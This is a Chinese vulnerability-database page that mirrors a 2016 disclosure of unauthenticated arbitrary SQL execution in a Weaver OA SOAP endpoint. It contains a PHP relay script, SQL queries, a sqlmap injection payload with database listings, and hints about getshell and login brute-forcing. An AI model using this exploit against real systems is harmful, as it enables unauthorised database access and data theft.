泛微OA某接口无需登录可执行任意SQL语句（附脚本）

基本字段

漏洞编号：: SSV-95584

披露/发现时间：: 2016-02-26

提交时间：: 2016-02-26

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 浮萍

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2016-0178866

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：荒废了啥都不会找工作啊 ### 详细说明：先以本地为例 http://localhost:8088/ws [<img src="https://images.seebug.org/upload/201602/261505325ad6cc962e7df590d4fbbe74ea888bca.jpg" alt="Snap67.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/261505325ad6cc962e7df590d4fbbe74ea888bca.jpg) ``` http://localhost:8088/ws/query?wsdl ``` [<img src="https://images.seebug.org/upload/201602/26150714fab2776e42d8c9cec5a3b1ed92c57412.jpg" alt="Snap68.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/26150714fab2776e42d8c9cec5a3b1ed92c57412.jpg) 竟然提示 ``` <faultstring>Unmarshalling Error: unexpected element (uri:"http://**.**.**.**/", local:"arg0"). Expected elements are <{}arg1>,<{}arg0> </faultstring> ``` 搜索 [<img src="https://images.seebug.org/upload/201602/2615181165d4a7c015b4eff03b1f690f41abe9cd.jpg" alt="Snap69.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/2615181165d4a7c015b4eff03b1f690f41abe9cd.jpg) 提示是参数问题改代码肯定是不行的那就改参数吧 [<img src="https://images.seebug.org/upload/201602/2615252536a8ba93666e7b4094d45c3dbfe72ad3.jpg" alt="Snap71.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/2615252536a8ba93666e7b4094d45c3dbfe72ad3.jpg) ORA-00900: 无效 sql 语句看来是可以的更改第一个参数 ``` select SYS_CONTEXT('USERENV','CURRENT_USER') from dual ``` [<img src="https://images.seebug.org/upload/201602/261529415c75b1acc655b35470069209324e24b2.jpg" alt="Snap72.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/261529415c75b1acc655b35470069209324e24b2.jpg) 查看用户量 [<img src="https://images.seebug.org/upload/201602/2615305157d4a6dca1a586f6eafea56c58d2d285.jpg" alt="Snap73.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/2615305157d4a6dca1a586f6eafea56c58d2d285.jpg) 任意SQL执行继续中转 ``` <?php $arg0=$_GET['sql']; header("content-type:text/html;charset=utf-8"); try { $client = new SoapClient('http://localhost:8088/ws/query?wsdl'); $xml = " <SOAP-ENV:Envelope xmlns:SOAP-ENV='http://**.**.**.**/soap/envelope/' xmlns:soap='http://**.**.**.**/wsdl/soap/' xmlns:xsd='http://**.**.**.**/1999/XMLSchema' xmlns:xsi='http://**.**.**.**/1999/XMLSchema-instance' xmlns:m0='http://**.**.**.**/' xmlns:SOAP-ENC='http://**.**.**.**/soap/encoding/' xmlns:urn='http://**.**.**.**/'> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:queryBy> <arg0>1</arg0> <arg1>1</arg1> </urn:queryBy> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; $result=$client->queryBy(array('arg0'=>$arg0,'arg1'=>'1')); echo $result->return ;//显示结果 } catch (SOAPFault $e) { print_r('Exception:'.$e); } ?> ``` [<img src="https://images.seebug.org/upload/201602/261534275441950c0a20a1918da42f8844917d71.jpg" alt="Snap74.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/261534275441950c0a20a1918da42f8844917d71.jpg) SQL注入 ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: sql Type: inline query Title: Oracle inline queries Payload: sql=(SELECT CHR(113)||CHR(115)||CHR(112)||CHR(99)||CHR(113)||(SELEC T (CASE WHEN (8499=8499) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(101)||CHR( 112)||CHR(97)||CHR(113) FROM DUAL) --- [15:39:49] [INFO] the back-end DBMS is Oracle web server operating system: Windows web application technology: Apache 2.2.22, PHP 5.3.10 back-end DBMS: Oracle ``` ``` available databases [20]: [*] APEX_030200 [*] APPQOSSYS [*] CTXSYS [*] DBSNMP [*] EWEAVER [*] EXFSYS [*] FLOWS_FILES [*] MDSYS [*] OLAPSYS [*] ORDDATA [*] ORDSYS [*] OUTLN [*] OWBSYS [*] PM [*] SCOTT [*] SYS [*] SYSMAN [*] SYSTEM [*] WMSYS [*] XDB ``` ### 漏洞证明：官方：http://**.**.**.**:9085/ws/query?wsdl [<img src="https://images.seebug.org/upload/201602/26154455f207d294a3695c5236169bf1c877a2e4.jpg" alt="Snap76.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/26154455f207d294a3695c5236169bf1c877a2e4.jpg) [<img src="https://images.seebug.org/upload/201602/26154348dede073da2890dd3a00daaac84703c42.jpg" alt="Snap75.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/26154348dede073da2890dd3a00daaac84703c42.jpg) SQL注入就不进行了毕竟可以执行SQL语句 http://**.**.**.**/ws/query?wsdl [<img src="https://images.seebug.org/upload/201602/261546178688d91ef58dd71df3c5721177b8aedd.jpg" alt="Snap77.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/261546178688d91ef58dd71df3c5721177b8aedd.jpg) http://**.**.**.**/ws/query?wsdl [<img src="https://images.seebug.org/upload/201602/26154725889e6a12f2e4b1f10771760b8370fd9b.jpg" alt="Snap78.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/26154725889e6a12f2e4b1f10771760b8370fd9b.jpg) http://**.**.**.**/bugs/wooyun-2015-0148980 这个估计还没修复可以getshell http://localhost:8088/ws/ew?wsdl 可以用于爆破登录 [<img src="https://images.seebug.org/upload/201602/26155453866ba54bb3412b1066aca37e77b26c77.jpg" alt="Snap79.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/26155453866ba54bb3412b1066aca37e77b26c77.jpg) [<img src="https://images.seebug.org/upload/201602/261553055dab5e3a61df785ebcd27501f1feeb19.jpg" alt="Snap80.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201602/261553055dab5e3a61df785ebcd27501f1feeb19.jpg) 其他问题估计还有自测吧

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2016-0178866

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

生命线

浮萍

2016-02-26 发现/披露了漏洞

泛微OA某接口无需登录可执行任意SQL语句（附脚本）

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

泛微OA某接口无需登录可执行任意SQL语句（附脚本）

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定